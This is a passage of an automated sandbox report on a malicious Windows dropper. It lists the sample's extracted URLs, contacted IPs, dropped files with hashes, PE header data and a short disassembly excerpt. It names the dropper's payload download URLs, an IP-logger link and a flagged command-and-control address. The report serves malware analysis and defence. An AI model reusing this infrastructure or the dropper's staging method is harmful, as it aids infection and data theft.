http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id23	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id24	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
https://iplogger.org/1mhvg7e	VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id24Response	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id1Response	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_shockwave	mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	false		high
http://forms.rea	mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id10	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id11	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id12	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16Response	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id13	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://blairwitch.top/work/mix.exemopnns.exe?	VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id14	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id17	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id18	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5Response	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id10Response	mopnns.exe, 00000004.00000002.469278293.0000000002612000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id8Response	mopnns.exe, 00000004.00000002.469278293.0000000002612000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://blairwitch.top/jollion/apines.exet	VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_wmp	mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey	mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.15	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
8.209.114.247	blairwitch.top	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
5.9.162.45	iplogger.org	Germany	24940	HETZNER-ASDE	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528743
Start date:	25.11.2021
Start time:	18:22:22
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 26s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	VYeSXonMT1.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@5/4@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 12.6% (good quality ratio 12.2%) Quality average: 84.8% Quality standard deviation: 23.1%
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.msftconnecttest.com, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:23:37	API Interceptor	2x Sleep call for process: VYeSXonMT1.exe modified
18:24:15	API Interceptor	35x Sleep call for process: mopnns.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.215.113.15	5VJzvHGsFi.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	5kGH7a46k9.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	MJE3eAJcb2.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	gbKGx1IEFK.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	DnoEE5GXPY.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	ehybd0h0GM.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	jvD4W5Csk1.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	gu3i8QdnBI.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	XqsSqSatDk.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	oxlesp2DxT.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	Djd7ehHiF8.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	Fza2KHjrJo.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	uqAN1HyXRQ.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	84E73QAxW7.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	1cQf9ygE74.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	Wp68AnVuL6.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	kum7Tat25I.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	bsLo9v48Ed.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	7D7QOqFHCS.exe	Get hash	malicious	Browse	185.215.113.15:61506/
	x0PFLATjFE.exe	Get hash	malicious	Browse	185.215.113.15:61506/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
iplogger.org	duLT5gkRjy.exe	Get hash	malicious	Browse	5.9.162.45
	EaCmG75WxF.exe	Get hash	malicious	Browse	5.9.162.45
	EaCmG75WxF.exe	Get hash	malicious	Browse	5.9.162.45
	5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exe	Get hash	malicious	Browse	5.9.162.45
	6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exe	Get hash	malicious	Browse	5.9.162.45
	j0UcwcqjvM.exe	Get hash	malicious	Browse	5.9.162.45
	0K31jgS20G.exe	Get hash	malicious	Browse	5.9.162.45
	vAsfZhw32P.exe	Get hash	malicious	Browse	5.9.162.45
	FhP4JYCU7J.exe	Get hash	malicious	Browse	5.9.162.45
	FhP4JYCU7J.exe	Get hash	malicious	Browse	5.9.162.45
	WQRrng5aiw.exe	Get hash	malicious	Browse	5.9.162.45
	WQRrng5aiw.exe	Get hash	malicious	Browse	5.9.162.45
	e8rimWGicH.exe	Get hash	malicious	Browse	5.9.162.45
	kq5Of3SOMZ.exe	Get hash	malicious	Browse	5.9.162.45
	RtpLhZOyaf.exe	Get hash	malicious	Browse	5.9.162.45
	vWNrGi9qLx.exe	Get hash	malicious	Browse	5.9.162.45
	VDnn1698j5.exe	Get hash	malicious	Browse	5.9.162.45
	TEiwRyJ2v1.exe	Get hash	malicious	Browse	5.9.162.45
	iIrI72Motw.exe	Get hash	malicious	Browse	5.9.162.45
	sBz6zVtsB1.exe	Get hash	malicious	Browse	5.9.162.45
blairwitch.top	j0UcwcqjvM.exe	Get hash	malicious	Browse	8.209.64.34
blairwitch.top	0K31jgS20G.exe	Get hash	malicious	Browse	8.209.64.34

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	OPKyR75fJn.exe	Get hash	malicious	Browse	8.209.79.122
	AO7gki3UTr.exe	Get hash	malicious	Browse	47.254.176.217
	3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exe	Get hash	malicious	Browse	8.209.76.178
	23062BA932165210EBB3FFCD15474E79F19E6AD74869F.exe	Get hash	malicious	Browse	8.209.76.178
	lUutlamdAP.exe	Get hash	malicious	Browse	47.251.32.165
	a.dll	Get hash	malicious	Browse	47.244.196.91
	3721a848b1944daae68ab118cb9bd748b6864b154c671.exe	Get hash	malicious	Browse	8.209.117.96
	j0UcwcqjvM.exe	Get hash	malicious	Browse	8.209.64.34
	0K31jgS20G.exe	Get hash	malicious	Browse	8.209.64.34
	GI1pY86l1D.exe	Get hash	malicious	Browse	8.209.64.110
	GI1pY86l1D.exe	Get hash	malicious	Browse	8.209.64.110
	2Q4ULMiXNx.exe	Get hash	malicious	Browse	8.209.115.161
	7mpMtH6TCH.exe	Get hash	malicious	Browse	8.209.64.110
	a4k5dLc3e5.exe	Get hash	malicious	Browse	8.209.64.110
	hghRkyWs3S.exe	Get hash	malicious	Browse	8.209.115.161
	d4cqHJ5Vz6.exe	Get hash	malicious	Browse	8.209.117.96
	b5Bot4baXW.exe	Get hash	malicious	Browse	8.209.117.96
	44E401AAF0B52528AA033257C1A1B8A09A2B10EDF26ED.exe	Get hash	malicious	Browse	8.209.115.161
	Fm9bT1UlKI.exe	Get hash	malicious	Browse	8.209.115.161
	oKY1oBcWbg.exe	Get hash	malicious	Browse	8.209.115.161
WHOLESALECONNECTIONSNL	OsFhRVxR08.exe	Get hash	malicious	Browse	185.215.113.53
	f2o6ud2wuc.exe	Get hash	malicious	Browse	185.215.113.29
	yKxThz27L9.exe	Get hash	malicious	Browse	185.215.113.29
	uhplYUxH9u.exe	Get hash	malicious	Browse	185.215.113.57
	EML3hW4WH6.exe	Get hash	malicious	Browse	185.215.113.29
	IiLv70XyA5.exe	Get hash	malicious	Browse	185.215.113.29
	SecuriteInfo.com.Variant.Fragtor.43959.21953.exe	Get hash	malicious	Browse	185.215.113.29
	3bQuU0T23a.exe	Get hash	malicious	Browse	185.215.113.29
	qSHHi1p0nc.exe	Get hash	malicious	Browse	185.215.113.205
	3721a848b1944daae68ab118cb9bd748b6864b154c671.exe	Get hash	malicious	Browse	185.215.113.29
	3AxZmwjmfZ.exe	Get hash	malicious	Browse	185.215.113.17
	j0UcwcqjvM.exe	Get hash	malicious	Browse	185.215.113.17
	0K31jgS20G.exe	Get hash	malicious	Browse	185.215.113.15
	d4cqHJ5Vz6.exe	Get hash	malicious	Browse	185.215.113.29
	b5Bot4baXW.exe	Get hash	malicious	Browse	185.215.113.29
	IiTxxlNtlD.exe	Get hash	malicious	Browse	185.215.113.29
	Ft7p6bqxlr.exe	Get hash	malicious	Browse	185.215.113.29
	6KdgyhR5sq.exe	Get hash	malicious	Browse	185.215.113.29
	1rcteU8Fxb.exe	Get hash	malicious	Browse	185.215.113.29
	7b91e9f9e71958ca487aabd657b044009703e38861e74.exe	Get hash	malicious	Browse	185.215.113.57

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	Tk6dsSEyOC.exe	Get hash	malicious	Browse	5.9.162.45
	yH8giB6jJ2.exe	Get hash	malicious	Browse	5.9.162.45
	AO7gki3UTr.exe	Get hash	malicious	Browse	5.9.162.45
	5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exe	Get hash	malicious	Browse	5.9.162.45
	asbestos_safety_and_eradication_agency_enterprise_agreement 41573 .js	Get hash	malicious	Browse	5.9.162.45
	J73PTzDghy.exe	Get hash	malicious	Browse	5.9.162.45
	asbestos_safety_and_eradication_agency_enterprise_agreement 64081 .js	Get hash	malicious	Browse	5.9.162.45
	dIVWfjBCXV.exe	Get hash	malicious	Browse	5.9.162.45
	UYsk9P766s.exe	Get hash	malicious	Browse	5.9.162.45
	doc201002124110300200.exe	Get hash	malicious	Browse	5.9.162.45
	INVOICE - FIRST 2 CONTAINERS 1110.docx	Get hash	malicious	Browse	5.9.162.45
	INVOICE - FIRST 2 CONTAINERS 1110.docx	Get hash	malicious	Browse	5.9.162.45
	F06FA33D36606CF5A9DD11FE35348EB6A3E8871367CE4.exe	Get hash	malicious	Browse	5.9.162.45
	JITStarter.exe	Get hash	malicious	Browse	5.9.162.45
	JITStarter.exe	Get hash	malicious	Browse	5.9.162.45
	0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Get hash	malicious	Browse	5.9.162.45
	C54CA1DF46D817348C9BDF18F857459D7CA05C51F7F30.exe	Get hash	malicious	Browse	5.9.162.45
	6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exe	Get hash	malicious	Browse	5.9.162.45
	j0UcwcqjvM.exe	Get hash	malicious	Browse	5.9.162.45
	0K31jgS20G.exe	Get hash	malicious	Browse	5.9.162.45

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mopnns.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\blair\mopnns.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2291
Entropy (8bit):	5.3192079301865585
Encrypted:	false
SSDEEP:	48:MIHK5HKXRfHK7HKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHKoLHG1qHqHAH5HX:Pq5qXdq7qLqdqUqzcGYqhQnoPtIxHbq4
MD5:	924DEA6470CAC502B24442CF377CE6A7
SHA1:	133C304912A1DF4AF62F6EDCA3EA21F3E0CE7F4F
SHA-256:	2B2572C7D0134EEF12644AF90D61302A50E7B550FFB4629666F8C566F34BED0D
SHA-512:	34C817F3F4D87AAD5F6902BB80522B59FE8F9935C86819B575B6139EBDEF3026866ED802DB1D36765CF7ECCF323692705DCA3D799FC7CFF7C0114B08CBE9F7A9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b

C:\Users\user\AppData\Roaming\blair\arinesp.exe Download File
Process:	C:\Users\user\Desktop\VYeSXonMT1.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	276
Entropy (8bit):	5.2038261559763574
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIRDFLMUxZslcXaoD:J0+oxBeRmR9etdzRxGezHxtEma+
MD5:	9D8723967325F573ECFD6E700C7F5371
SHA1:	9E0533AA689EBBB0C66723967A0E598AEC82AECE
SHA-256:	A21A26067877C1A2AA681C26833B2DA9114376FC7A4AF44321856EEFCD4ECD29
SHA-512:	0F7517F000D55E78DFC164A2CAE4CEC1A4892CFEE92EB8323EF4118F6275598CC2EDEA22547B2B9912E42DC73B28B5BAD50C2A89E9AAF203A03CC58DEFBD3B1F
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.38 (Debian) Server at blairwitch.top Port 80</address>.</body></html>.

C:\Users\user\AppData\Roaming\blair\mopnns.exe Download File
Process:	C:\Users\user\Desktop\VYeSXonMT1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	292352
Entropy (8bit):	7.361248378747306
Encrypted:	false
SSDEEP:	6144:YmFGp25BnFgEIJNDRsJfj2u/5rJU28roUIad0FH:Tu2XSEcslj2uhrJUZL0F
MD5:	3F91E0102D6832F36DA2D908672B2266
SHA1:	F3CD0DEE9DDBE111D6978134707A5963EAB3A698
SHA-256:	2934BD9EAE57BDF2B28F963A32B4E916D739427E8DE096DF007FC0EED5A1F910
SHA-512:	3318AE08512154AF48D0ED7A79D7DD5B99BBB45F309E0943ABEDBE92857EEA23CD22B3CB6B97C271B1429F38616749F3CB80B7432AC9ED5344760A5769021584
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L....4.^.................j...f.......,............@.........................................................................T...x....p..xu.............................................................@...............\|............................text....i.......j.................. ..`.rdata..&x.......z...n..............@..@.data....b..........................@....rsrc...xu...p...v..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Users\user\Desktop\VYeSXonMT1.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.212417514675578
Encrypted:	false
SSDEEP:	12288:+cc0Th31T2p6lTSPGRq9WOia8lPCe0l0P5jh/r642p94mu9h8pyhJH:9c0Th31T2pYTSPjYTrWN
MD5:	3772F022DAAF6D31663200AABA7DE6C0
SHA1:	23722E4471CF065754D5B9FF825FA8EDD7317BB7
SHA-256:	7EE9DEB17E5E3211CA4E602DB11410C75D053B028E7D67DA4FA2B7FF759A1A32
SHA-512:	A0C2683045874934296076427F2DF17A722C46CCFA0CA9C7D1D2706FEC252F6A686E572586FC9E8A2C5B4C3E6F69BB35251C1F31FBB387DE5BF9C29E7995465E
Malicious:	false
Reputation:	low
Preview:	regfU...U...p.\..,.................. ....p......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmv..l...............................................................................................................................................................................................................................................................................................................................................Z...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.292229717146009
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	VYeSXonMT1.exe
File size:	680960
MD5:	0e852a9d4e42120623c0112e53f70992
SHA1:	980fed1b88c494360a3eaad95fd3da046bb85f6e
SHA256:	6c00faff9e01fa7fe3a9a681658c61b4802817a91b74351f7a3e6ad19540f9f1
SHA512:	4c0d733030fb78c70eab1e796a8288973cf2b6386ea17c2ab86b7b98ff08837ebf578ca8d3fa31ed4fe64f4946168fc688805903015bbf14545d6f59d7eb4a53
SSDEEP:	12288:wmv0iVumrX8Pgtcaf9LBwjsdOSwaMWXKpxpm0E6T7TLZcYA3ucQ0eHn7b:wmv0+/XEgtca9POSwaMWXKpxpmATLJcg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#...p...p...p..Wp...p..bp...p..Vp...p..op...p...pa..p..Sp...p..fp...p..ap...pRich...p........PE..L...p.b`...................

File Icon


Icon Hash:	b2e8e8e8aaa2a488

Static PE Info

General
Entrypoint:	0x473ae0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6062D970 [Tue Mar 30 07:55:28 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	ee6524c22cc0cf74d4c47508c44cd3e2

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007FBE7498076Bh
call 00007FBE74980476h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0048B7A0h
push 00477D00h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [0048E064h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401314h]
cmp dword ptr [01C411BCh], 00000000h
jne 00007FBE74980470h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [00401310h]
call 00007FBE749805F3h
mov dword ptr [ebp-6Ch], eax
call 00007FBE749845BBh
test eax, eax
jne 00007FBE7498046Ch
push 0000001Ch
call 00007FBE749805B0h
add esp, 04h
call 00007FBE74983F18h
test eax, eax
jne 00007FBE7498046Ch
push 00000010h
call 00007FBE7498059Dh
add esp, 04h
push 00000001h
call 00007FBE74983E63h
add esp, 04h
call 00007FBE74981B1Bh
mov dword ptr [ebp-04h], 00000000h
call 00007FBE749816FFh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8bd84	0x78	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1843000	0x6e85	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x184a000	0x17c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1410	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x73908	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x3c4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8c4a2	0x8c600	False	0.864043020926	data	7.81616488491	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x8e000	0x17b41c0	0x1400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
